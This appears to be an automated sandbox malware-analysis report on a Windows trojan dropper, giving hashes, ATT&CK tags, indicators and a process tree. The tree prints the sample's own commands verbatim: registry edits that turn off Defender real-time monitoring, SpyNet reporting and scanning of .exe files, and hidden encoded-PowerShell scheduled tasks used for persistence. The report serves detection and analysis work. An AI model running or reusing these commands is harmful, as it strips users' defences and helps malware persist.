91f46858f0c0c41956f3a32bd9431d4870c971a0046341c637e5fb66ba2225d6

Analysis

max time kernel
152s
max time network
143s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
03-10-2022 03:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

39e04a79618a8124f50e36a9da48b0ae
SHA1

f4af312ff672e5dbb48fba0f0da43e834c056a23
SHA256

91f46858f0c0c41956f3a32bd9431d4870c971a0046341c637e5fb66ba2225d6
SHA512

c1b524fb9ea93249102e2a519e5fddb5a891edef37a3bc6a753ae4638fd195d021ef6aa44f9d99e7c7ea13bbbf32cc410a6a12298082a57199bcd69ebcfca2a1
SSDEEP

196608:91O15kTwkxlP3zqeWrQMOJXwqUUtzBvwLsKtSUi:3O15Gwkfqe17rUUtlvZKt5i

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0"	reg.exe

Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exeOZFGBZe.exe

pid process

112 Install.exe
1688 Install.exe
1520 OZFGBZe.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Loads dropped DLL 8 IoCs

Processes:

file.exeInstall.exeInstall.exe

pid process

1076 file.exe
112 Install.exe
112 Install.exe
112 Install.exe
112 Install.exe
1688 Install.exe
1688 Install.exe
1688 Install.exe

pid	process
112	Install.exe
1688	Install.exe
1520	OZFGBZe.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
1076	file.exe
112	Install.exe
112	Install.exe
112	Install.exe
112	Install.exe
1688	Install.exe
1688	Install.exe
1688	Install.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.EXEInstall.exepowershell.EXEOZFGBZe.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	OZFGBZe.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	OZFGBZe.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	OZFGBZe.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

924 schtasks.exe
1528 schtasks.exe
1620 schtasks.exe
1760 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job	schtasks.exe

pid	process
924	schtasks.exe
1528	schtasks.exe
1620	schtasks.exe
1760	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

pid	process
1788	powershell.EXE
1788	powershell.EXE
1788	powershell.EXE
1128	powershell.EXE
1128	powershell.EXE
1128	powershell.EXE
288	powershell.EXE
288	powershell.EXE
288	powershell.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

description pid process

Token: SeDebugPrivilege 1788 powershell.EXE
Token: SeDebugPrivilege 1128 powershell.EXE
Token: SeDebugPrivilege 288 powershell.EXE

description	pid	process
Token: SeDebugPrivilege	1788	powershell.EXE
Token: SeDebugPrivilege	1128	powershell.EXE
Token: SeDebugPrivilege	288	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 1076 wrote to memory of 112	1076	file.exe	Install.exe
PID 1076 wrote to memory of 112	1076	file.exe	Install.exe
PID 1076 wrote to memory of 112	1076	file.exe	Install.exe
PID 1076 wrote to memory of 112	1076	file.exe	Install.exe
PID 1076 wrote to memory of 112	1076	file.exe	Install.exe
PID 1076 wrote to memory of 112	1076	file.exe	Install.exe
PID 1076 wrote to memory of 112	1076	file.exe	Install.exe
PID 112 wrote to memory of 1688	112	Install.exe	Install.exe
PID 112 wrote to memory of 1688	112	Install.exe	Install.exe
PID 112 wrote to memory of 1688	112	Install.exe	Install.exe
PID 112 wrote to memory of 1688	112	Install.exe	Install.exe
PID 112 wrote to memory of 1688	112	Install.exe	Install.exe
PID 112 wrote to memory of 1688	112	Install.exe	Install.exe
PID 112 wrote to memory of 1688	112	Install.exe	Install.exe
PID 1688 wrote to memory of 1148	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 1148	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 1148	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 1148	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 1148	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 1148	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 1148	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 576	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 576	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 576	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 576	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 576	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 576	1688	Install.exe	forfiles.exe
PID 1688 wrote to memory of 576	1688	Install.exe	forfiles.exe
PID 576 wrote to memory of 1540	576	forfiles.exe	cmd.exe
PID 576 wrote to memory of 1540	576	forfiles.exe	cmd.exe
PID 576 wrote to memory of 1540	576	forfiles.exe	cmd.exe
PID 576 wrote to memory of 1540	576	forfiles.exe	cmd.exe
PID 576 wrote to memory of 1540	576	forfiles.exe	cmd.exe
PID 576 wrote to memory of 1540	576	forfiles.exe	cmd.exe
PID 576 wrote to memory of 1540	576	forfiles.exe	cmd.exe
PID 1148 wrote to memory of 1128	1148	forfiles.exe	cmd.exe
PID 1148 wrote to memory of 1128	1148	forfiles.exe	cmd.exe
PID 1148 wrote to memory of 1128	1148	forfiles.exe	cmd.exe
PID 1148 wrote to memory of 1128	1148	forfiles.exe	cmd.exe
PID 1148 wrote to memory of 1128	1148	forfiles.exe	cmd.exe
PID 1148 wrote to memory of 1128	1148	forfiles.exe	cmd.exe
PID 1148 wrote to memory of 1128	1148	forfiles.exe	cmd.exe
PID 1540 wrote to memory of 1724	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1724	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1724	1540	cmd.exe	reg.exe
PID 1128 wrote to memory of 1472	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 1472	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 1472	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 1472	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 1472	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 1472	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 1472	1128	cmd.exe	reg.exe
PID 1540 wrote to memory of 1724	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1724	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1724	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1724	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1668	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1668	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1668	1540	cmd.exe	reg.exe
PID 1128 wrote to memory of 624	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 624	1128	cmd.exe	reg.exe
PID 1128 wrote to memory of 624	1128	cmd.exe	reg.exe
PID 1540 wrote to memory of 1668	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1668	1540	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1076

C:\Users\Admin\AppData\Local\Temp\7zS6B23.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:112

C:\Users\Admin\AppData\Local\Temp\7zS78E8.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1128

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1472

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:624

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1540

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:1724

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1668

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gfpKUalwV" /SC once /ST 04:40:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:924

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gfpKUalwV"
4⤵
PID:1108

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gfpKUalwV"
4⤵
PID:1996

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 05:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\OZFGBZe.exe\" d8 /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1528

C:\Windows\system32\taskeng.exe
taskeng.exe {D5AE7D66-561B-4E3B-BF8B-3F4A148E5B8D} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:288

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:624

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1784

C:\Windows\system32\taskeng.exe
taskeng.exe {C86953BA-5EE8-4F36-BBD8-FEE4EF658AB5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:268

C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\OZFGBZe.exe
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\OZFGBZe.exe d8 /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1520

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gKYgTMhLC" /SC once /ST 00:43:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1620

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gKYgTMhLC"
3⤵
PID:628

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gKYgTMhLC"
3⤵
PID:1788

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1712

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1988

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1480

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:692

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gvCvAgkJa" /SC once /ST 00:31:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1760

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gvCvAgkJa"
3⤵
PID:1596

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gvCvAgkJa"
3⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1972

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:980

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1748

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:968

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1884

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
4⤵
PID:852

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
3⤵
PID:664

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
4⤵
PID:956

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\fwhiGQHhSfnZUzkc\MkfTKgly\lXXCqbWMzZnFQrwD.wsf"
3⤵
PID:1764

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\fwhiGQHhSfnZUzkc\MkfTKgly\lXXCqbWMzZnFQrwD.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1728

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1884

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1540

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS6B23.tmp\Install.exe
Filesize
6.2MB

MD5
60e1b9be0cc604e0527ac0523e689150

SHA1
4a0ac355d6c7bb4f41631b7bef01879672b17330

SHA256
0529307a084043c429ac53b20f309868bcdd24a08b006af2df20cf45d115986f

SHA512
1cde30f820979d6d72ca23c6afb54aabc57a082e2146607053d88e0a01cf5fceb9f782abeb879170ccba06fbf90105828702332f962032ab454b23165df42e71

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6B23.tmp\Install.exe
Filesize
6.2MB

MD5
60e1b9be0cc604e0527ac0523e689150

SHA1
4a0ac355d6c7bb4f41631b7bef01879672b17330

SHA256
0529307a084043c429ac53b20f309868bcdd24a08b006af2df20cf45d115986f

SHA512
1cde30f820979d6d72ca23c6afb54aabc57a082e2146607053d88e0a01cf5fceb9f782abeb879170ccba06fbf90105828702332f962032ab454b23165df42e71

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS78E8.tmp\Install.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS78E8.tmp\Install.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\OZFGBZe.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\OZFGBZe.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
89bdd1f49d18180f3a12c618e75701e5

SHA1
d8631159ac1a8b6946705cdfb6177d918cf48bab

SHA256
76b4d06814315427c4becd79a6cb677d2d6b0113fa47db01da8b26c7d705a3e3

SHA512
a8933a2c1c81907a7d5254133cca8bb22678f926c56531e8c18e3b95c371b462b1cebea64382ab8d2ec782580f8f7c6284cf828f9f5e31f5fbe9feca7ccaf61d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
e39dfae23c012f15212b3634d75fa4d9

SHA1
8ca5b4a3ecf54944ef56f3dc531431810f378351

SHA256
553a6fbece745610bfc250fb66b8d2cd75a46f7f147cf30d39ca107dfb763e51

SHA512
4670a6c94eed672775e19dba43b328f4df6eb23ce3791bbc0a2d8463cd9b02ae7760e7d3bb8443818473a51eec45230ef089181769b5e74d9e5c47835e5d33cf

Download Submit
C:\Windows\Temp\fwhiGQHhSfnZUzkc\MkfTKgly\lXXCqbWMzZnFQrwD.wsf
Filesize
8KB

MD5
5640696d2689f7fd5358be52810e98f8

SHA1
9c1a96bc3b6f909fa0f69800e4cfe347d34c2075

SHA256
aeeaae62836fe974ffbc70d12dc7e103c1ca73c35ee630ca211258507a65855d

SHA512
95b05eef3f0ef40fdacfdc24b3cd57e5fdae5bd98f21398bb10a0e7ef1f18da573d438f6f5e79bad1384b634f5ffb5c4d4acd8612966eb3d8b5ad3bffdf37820

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini
Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6B23.tmp\Install.exe
Filesize
6.2MB

MD5
60e1b9be0cc604e0527ac0523e689150

SHA1
4a0ac355d6c7bb4f41631b7bef01879672b17330

SHA256
0529307a084043c429ac53b20f309868bcdd24a08b006af2df20cf45d115986f

SHA512
